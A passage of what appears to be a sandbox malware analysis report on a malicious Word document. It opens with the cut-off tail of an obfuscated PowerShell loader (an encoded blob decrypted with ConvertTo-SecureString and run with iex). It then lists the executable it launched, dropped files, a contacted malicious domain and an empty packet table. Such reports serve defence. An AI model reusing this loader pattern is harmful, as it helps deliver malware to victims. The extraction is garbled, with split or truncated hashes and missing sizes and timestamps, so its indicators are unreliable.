MgBkAGMANgBjADMANwAzADEAMwA4ADYAOQAzADUAOQA0ADUAMQA3AGIANwAwAGMAOABjAGQANAAzADIAZgBhAGMAYQA2ADUANQA3AGEAMwA1AG MAMQAwADMANAA2AGQANgBjADMAZQAyADMANQBjADUAYgBlADIAYwAwADIANQA4AGQAMAA2AGIAYQA2ADEAMQAwADkAZABhADQAZgBlAGEAOQA1 ADIAOQAxADUANwAxAGEAOABmADgAYwA2AGIAMQA1ADEAZQA1ADkANwAyADUANwBmADAANABmADAAZQBhADkAYwA0ADIAZQAyADIAOQA2AGYAOA A4ADcAMwBhADgAYQAxAGYAOQBlADYANwBmADYAOABhAGEAMwA1AGMANwA4ADcAYQBiADMANAAwAGUAZgAzAGIAYgBjADAAMQA2AGEAMgAwAGQA YgBmADkANAA4AGEANwAxADgAOQA1AGUAYwA5ADIAMwBhADMAYQAxAGQANwA4ADMAOABjAGMAMgBlADQAZgA0AGMAZAAxADEAZQBiADYAMQBmAG QAOQA0ADQAYwA1ADEAMgAyADUAOAA0AGEAOQAyADEAOQAwADcAYgAxAGUANwA1AGQAZAA5AGMANwBmADEANQAxADMAZgA4AGEANwAyAGYAOQA1 AGYAZgBkADIAYwA4ADQANwAwADQAYQAwADAANgA1ADkANgA1ADcAOABkADcAZQBiADcAZgAzADgAZQAwADIAMwA3ADAANAA2ADQAMQA5AGIAYQ A4AGIAZABkADYAMQA3ADgANQBkADkANQA2AGIAZQA2AGQANQAxADAAOAAwADcAZAA0AGMANAA4AGIAYgBkADMAOAAwAGEAMAAyADkAOQAzADYA MwBhADMAOAA4ADgANgBhAGUANABlADMANgA0ADcAMQA4ADkAZgAxADEAYwAzADQAZABhADYAYgBiAGUAMwAyAGEANQAwADEAZgBhADQANQAwAG YANABkADkAMwAwADUAMgA5ADAAMgA5ADcAZgA2ADcANQAyADMANwAyADgAYQA5ADQANQBiAGEAZAAzAGIANABmADkAZAA2AGMAYwA4ADQANAA1 ADEANQA5AGMAOAAyADAAOABiAGQAZAAyAGMANQAzADkAOQAxADkAZQA0ADQAMgA3ADcAMAA0ADAAOAA0AGUAOAA4AGIAOQBlADAAOQA3ADkAYQ BkADQAMQA0ADkAZQA3AGMAOQA2ADQAYQA4ADAAZQAzADMAYgA3ADYANwAxADUAMQAwAGIANAA2AGQAMABlAGYANgA4ADYAMQBlADMAMgAwAGMA MQAwAGYAZQA4AGUAOQA5AGIAYwA5AGIAMwA4AGYAYwAzAA==' CONVerttO-sEcuReStriNg -key (88..65))) )) iex 92F44E405DB16AC55D97E3BFE3B132FA) exe (PID: 2760 cmdline: 'C:\Users\Public\72312.exe' 5FB49CF5D2069F46387BF6CFE10E752E) Copyright Joe Security LLC 2018 Page 13 of 41

14 72312.exe (PID: 2840 cmdline: C:\Users\Public\72312.exe 5FB49CF5D2069F46387BF6CFE10E752E) OSPPSVC.EXE (PID: 2220 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 358A9CCA612C68EB2F07DDAD4CE1D8D7) PartitionClu.exe (PID: 2504 cmdline: C:\Windows\system32\PartitionClu.exe 5FB49CF5D2069F46387BF6CFE10E752E) cleanup PartitionClu.exe (PID: 2544 cmdline: C:\Windows\system32\PartitionClu.exe 5FB49CF5D2069F46387BF6CFE10E752E) Created / dropped Files C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat C:\Program Files\Common Files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe data Size (bytes): Entropy (8bit): F432CD4E05C3348F006A71FD6DD515B 00AE038BD1648FDA21AEF20842C93126B7772A FC4A3D6E1A0F3F91FC6D80CA710E7F8AFDB23F8D398111AEE1E9610E D283EDF0B2A05A E87153A28F5B A3D650A851C43FDAA960BC7F E56C0FF6BD5A DB34CB0CE63C352D86312AA0F33D5859B C:\Users\Public\72312.exe Size (bytes): Entropy (8bit): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PE32 executable (GUI) Intel 80386, for MS Windows 5FB49CF5D2069F46387BF6CFE10E752E D544687F7B25588FF1797F0DE259036FA9C5B125 6BB746DA74328DF29CFF48BF C4549AFE5D0BFFB432D69D34D16E45F09 A8B9DA89A2E3E5A466AAEE08EE97056A00C2B44ABD3BE52EEC9CAC7BB19D6CF4AC05C84F213EAC0A08F50AA 5F0C74470C552D0CEED800DACF191EC22C38CABA7 true C:\Users\SAMTAR~1\AppData\Local\Temp\JavaDeployReg.log Size (bytes): 89 ASCII text, with CRLF line terminators Entropy (8bit): A27BBFE84B848F0A47C87DF6DC187 3A0388C49EBF FE7E8E0C6F41061E70E 8741CE84CEFCBB8B BDBC2A3B499060E07FD0D23BC86BFF5BBECDC8AD C452C2783F E550CC2816D77FEF99CE5DA9F5A3BF6EC B6BF2156AF C E9DB0 F960FF10B245CC4EC BFB8C592B8C C:\Users\SAMTAR~1\AppData\Local\Temp\~DF1FFEFA1D TMP FoxPro FPT, blocks size 258, next free block index Size (bytes): Entropy (8bit): AD0ECF42D22B7C1B5C95D95B651CB 304ED13965EDB264F06BF6B585B9BF29EC1D251F 9BABBC30815EE219B06BACBE030375B1E490A B7D62B2AD3C70DC2CE0E AE267E03C839BBA1E2F35B56797A33673BF2E8D439C6C83B0A30FAAFA8660B DEC3C8E9F138753E40FD 8EB3859CE6E4ED64E500378BDB81D9329F157E Copyright Joe Security LLC 2018 Page 14 of 41

15 C:\Users\SAMTAR~1\AppData\Local\Temp\~DF6EE3256C465657F7.TMP FoxPro FPT, blocks size 258, next free block index Size (bytes): Entropy (8bit): C40D00E709403EFAFF05B3A056BDD CCE7C8AA2F80779E869E2E21EA916C671E87 4FD592DC76409BD13E0E6A23A3D5235F95CE01CC3C43E1CCE6A937856D BB522AC984BF150050F3B1639C7548D801D26A4AA23F15D97549EF03676D72C35D9A6B39E61CB7FBD1C8DBB7FE 342D42A59549D254A9F84AB488D7C991FD61BA C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF B E0 4 data Size (bytes): 471 Entropy (8bit): B93B055F18ED02AC BFA E49C843005A144BE3DE9485B1F9BC4E5A9126D A2649B55B45DF55AC2A B428AD312A749BDA88AA21B6C800DCE6AD4CED 1A7E8C92A1516E9B2E224E239C29EA395C615585A429B5FDF66B794DBBE6336C2BCE435ACD4F145563E5ACB4E DDBE001566E1BB345BF9F6F5EAE0341B9AAB2A6 C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F data Size (bytes): 4221 Entropy (8bit): EBCDD9823F89EC48ADA65C3E6F D276145E99F2A28F2C24CC86767DD0FC25F3DD 2203AF94B8C5CEBA DAF8103A099A387FF6D9C5F9AA85AEF5146AB FB0C F28F0D4984A9132AC57CEBB E00AC40C07875FB4371E7F7A43FB266B5F7AB162BE2C4 AD5EE8A386A05A6F0E8CECD0995E213E18C93 C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 data Size (bytes): 340 Entropy (8bit): B B788F4A5FFB7745B46 550EBD7A1B494874C5242D786EA4C9C4E07A613D F5737BAC1928EDEB3CCECA41DED D0373CCA9682CE10CAF41E28ED4B 6262E2AD1081F300B1F0DB6F34068D CC0B173E1C312CB639520F6CF2CD7C077AF8719FE C0B7 3F141CA3CAF177D91ED2A70B7E1B5493B7F7 C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF B E04 data Size (bytes): 434 Entropy (8bit): A63F595134F22D39D461A8B576E5ADF0 0B5B9FCB9A0C5F79BBA7B E5B8F57BD45C 365BCD DA92FA7B6D373CEBE380DA1AE06F2AD6AE0B3CF92BAFE49755 Copyright Joe Security LLC 2018 Page 15 of 41

16 C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF B E04 CC20F6BF03A80C BC651128E66D9594AF858641ECE8F5F4B87514B2E528C6E891EC60B1A229FB90B E80FAA62CB6CA638D8A2C473638C76549CB7D C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F data Size (bytes): 226 Entropy (8bit): E86A8F7D256284B2B D78A1C D79F0BF9CB02176D2A0023DBC60F600D24E4C27C D2C419693C65E5B E061FF965D DB401C55EF03B B041EF458370E1C56A8E12F0C550D8EBBABF91CF7A4AAD4A5CF432812FB87A917655C1887D52E97C66 43F17C23D8C3E0FB6022BB12A3BC94735A370 C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\en-US.1 data Size (bytes): Entropy (8bit): A34CB996293FDE2CB7A4AC A 3C96C D1A77873CD62BC639B3A10653F C6A5377CBC07EECE33790CFC70572E12C7A48AD8296BE25C0CC805A1F384DBAD E1B7D F E70F68B1BE6FD0CA65DCCF4FF D44278D3A77F704AEDFF59D2DBC0D56A6 09B2590C8EC0DD6BC48AB30F1DAD0C07A0A3EE C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml Size (bytes): Entropy (8bit): XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators 7819E90AF435D4E5E75D4C8899C2C189 92F B829D67EC8E89BAEEFF293D31F B16ACA81105D63AD1B037CF162539EC5E9B0BED1A84A6EF218D869B85121D C35997C97DB8F46BD378FE1A4E2D5D518E85EDBC80FA13B7BEA0CDFC AE59884C4BCE8420 DDBAF6C147EE12D1591C11E6EFF9C0F C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AD1B83F1-2EEF-11E8-B3E3-CCDA62336E41}.dat Size (bytes): Microsoft Word Document Entropy (8bit): E4A C A82BEAA2D24D50 E12CC248CC8975F6B49FD410D600BBFBDEC3C269 5D6D7F36789DAAA376F465CFCB9605F50C10DBF72121B94D964E6C8E55F B7C333A75CC377335D B F8B78ABF0C9A9BE7140E5B9CF89D339D172A38B788C390F8BDCCC3A 139CDB1BFBEEF EB898A224CBC05F64 C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AD1B83F3-2EEF-11E8-B3E3-CCDA62336E41}.dat Microsoft Word Document Size (bytes): Copyright Joe Security LLC 2018 Page 16 of 41

17 C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AD1B83F3-2EEF-11E8-B3E3-CCDA62336E41}.dat Entropy (8bit): FD3EAB50FA199A351839E978F8C6F A4AF9DCE1F0C979D9E7FF49AE43C8174E F0C365577C053526E2C74B4DFB6F9619B1BBDA33B280F7252F719C56B 37F1BC7AF6795D3406F EB92D231FD21400E92C23F95BEECE461C96A6C927D0C F668D CB498489FC4B30471F0F0BB8F003417AE C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver98C1.tmp Size (bytes): Entropy (8bit): XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators 095C72688DE7D90E6526DC0D8878F3F6 A1CAE182FB7E86C74FB5467C0014B2A27472BE DA E9B4B0D245C5B7E1FAC1242A087DED44EAF3B792E4A231E AB7FD229A6F532AE11E4CCEB01F823810B33D5C740BC9F290C79646C422AFFC27DDB8476C931D6E4A9686EED97 0E219B6CEBBF68F9A12B6C629B6816CDE1615C C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver9E95.tmp Size (bytes): Entropy (8bit): XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators 095C72688DE7D90E6526DC0D8878F3F6 A1CAE182FB7E86C74FB5467C0014B2A27472BE DA E9B4B0D245C5B7E1FAC1242A087DED44EAF3B792E4A231E AB7FD229A6F532AE11E4CCEB01F823810B33D5C740BC9F290C79646C422AFFC27DDB8476C931D6E4A9686EED9 70E219B6CEBBF68F9A12B6C629B6816CDE1615C C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CMFZC4R\DYA doc.aoz6za6.partial 0 Size (bytes): Entropy (8bit): C A B90B A62A75BC8A40B56F9A0FCA4A6A15ABB77 1FC783B269BA8E3098B0B58B34D3A84597DB8B69422A5DC6369A B16 F6DCEF9A6EB8C082236D41645B07CE06BF10CC5F7A7BE281EAF5E1C40B51AD49815B67D474ECD269664E3C68A BF33F02E88CA8EEE23CAD5A4401EBEBBFA05626 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CMFZC4R\DYA doc.aoz6za6.partial:Zone.Identifier Size (bytes): 26 ASCII text, with CRLF line terminators Entropy (8bit): FBCCF14D504B7B2DBCB5A5BDA75BD93B D59FC84CDD5217C6CF F78DA6B582B EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913 AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC C5C2E53F803CD9E 3973DDEFC68966F974E124307B5043E654443B98 Copyright Joe Security LLC 2018 Page 17 of 41

18 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CMFZC4R\DYA doc:Zone.Identifier Size (bytes): 1 Entropy (8bit): 0.0 very short file (no magic) ECCBC87E4B5CE2FE28308FD9F2A7BAF3 77DE68DAECD823BABBB58EDB1C8E14D7106E83BB 4E BEDB8B60CE05C1DECFE3AD16B DE01F640B7E4729B49FCE 3BAFBF08882A2D A1B8433F50563B93C14ACD05B79028EB1D A66C276A E26C43B739BC65C4E16B10C3AF6C202AEBB C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\DYA [1].doc 0 Size (bytes): Entropy (8bit): C A B90B A62A75BC8A40B56F9A0FCA4A6A15ABB77 1FC783B269BA8E3098B0B58B34D3A84597DB8B69422A5DC6369A B16 F6DCEF9A6EB8C082236D41645B07CE06BF10CC5F7A7BE281EAF5E1C40B51AD49815B67D474ECD269664E3C68A BF33F02E88CA8EEE23CAD5A4401EBEBBFA05626 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\iecompatviewlist[1].xml Size (bytes): Entropy (8bit): XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators E5C53C B F1D541D440B 81EC E699A0BFA191B2AE1B74320D316CE 7DA1E84B3EE4D8FAD40B8A2B775F2CE1D8C38931D6B403294AE4EE8426FAFB7F 8094EA2119B2D321EB62916CD5584A8DF20A BCDBF2E9F20D5EEB5306D1F30A8607B EFF3F2E31 6F3634DAF3EEADFDC CB1C961644A92 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\suggestions[1].en-US data Size (bytes): Entropy (8bit): A34CB996293FDE2CB7A4AC A 3C96C D1A77873CD62BC639B3A10653F C6A5377CBC07EECE33790CFC70572E12C7A48AD8296BE25C0CC805A1F384DBAD E1B7D F E70F68B1BE6FD0CA65DCCF4FF D44278D3A77F704AEDFF59D2DBC0D56A6 09B2590C8EC0DD6BC48AB30F1DAD0C07A0A3EE C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ULEAKRVD\urlblockindex[1].bin Size (bytes): 16 Entropy (8bit): data FA518E3DFAE8CA3A0E495460FD60C791 E4F30E D37267C0162FD4A C C4B4E5F883F9FD5A278E61C471B3EE B6D129499AA7 D21667F3FB081D39B579178E74E9BB1B6E9A97F C165729A58F1787DC0ADADD980CD026C7A601D416665A 81AC13A69E49A6A2FE2FDD AA645C07 Copyright Joe Security LLC 2018 Page 18 of 41

19 C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ULEAKRVD\urlblockindex[1].bin C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C0B3E1FE-FA90-46FB-A94C-79F14B48BEF0}.tmp C:\Program Files\Microsoft Office\Office14\WINWORD.EXE FoxPro FPT, blocks size 0, next free block index , 1st used item "\375" Size (bytes): 1024 Entropy (8bit): D4D94EE7E06BBB0AF B23A DBB111419C704F116EFA8E72471DD83E86E C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D D997CC5FD1 95F83AE84CAFCCED5EAF C34D5F9710E5CA2D F2FBECCB25F9CF50BBFC272BD75E1A66A 18B7783F09E1C1454AFDA519624BC2BB2F28BA4 C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm C:\Program Files\Microsoft Office\Office14\WINWORD.EXE data Size (bytes): 162 Entropy (8bit): E7BD B9CFB276BECD6CE969F 55D998570D5B808657E7C140888B339F657E15C4 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E E 1FA62183BAC9C51409F44D219365B94043CBC5 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJPEF3JBHMKULG10F73D.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe data Size (bytes): 8016 Entropy (8bit): A9DDD03A4FD4167CF F86 08E335AC852820EFE33A899528C2D85A8BA85655 C9D6D7F7FC16E1CD3CC64B37BA DEFA747F019EAD21C7C12D6D3A74D FC8A349D8C389B4B5D2591D339B0B30EAB6D0E1056A38ED742FF1A62B41465FB832C8749A936BF18AE1CA9DD CCA59F0D910E3E4D94E63A08B78DE03C7A \samr Size (bytes): 116 Entropy (8bit): Hitachi SH big-endian COFF object, not stripped 080E701E8B8E2E9C68203C150AC7C6B7 4EF B805758AE1D3B122F9D FE129AE2A7C F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D C11D88B8E355B7B922B B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719 D892B4C0D22BB67BE0D57EAB368BA1BC057E79 Contacted Domains/Contacted IPs Contacted Domains Copyright Joe Security LLC 2018 Page 19 of 41

20 Name IP Active Malicious Antivirus Detection Reputation true 0%, virustotal, Browse unknown fscadvogados.net.br true true 7%, virustotal, Browse Contacted IPs No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs IP Country Flag ASN ASN Name Malicious United States AS GO-DADDY-COM-LLC- GoDaddycomLLCUS true United States GOOGLE-GoogleIncUS Spain INFORTELECOM-ASES true United States IO-DATA-CENTERS- IOCapitalPrincessLLCUS Brazil SCSOLUCOESEMTECNOLOGIA SABR true Static File Info No static file info Network Behavior Network Port Distribution Total Packets: undefined 80 (HTTP) 53 (DNS) Copyright Joe Security LLC 2018 Page 20 of 41

21 TCP Packets Timestamp Port Dest Port IP Dest IP Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Copyright Joe Security LLC 2018 Page 21 of 41

22 Timestamp Port Dest Port IP Dest IP Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Copyright Joe Security LLC 2018 Page 22 of 41

23 Timestamp Port Dest Port IP Dest IP Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Mar 24, :13: CET Copyright Joe Security LLC 2018 Page 23 of 41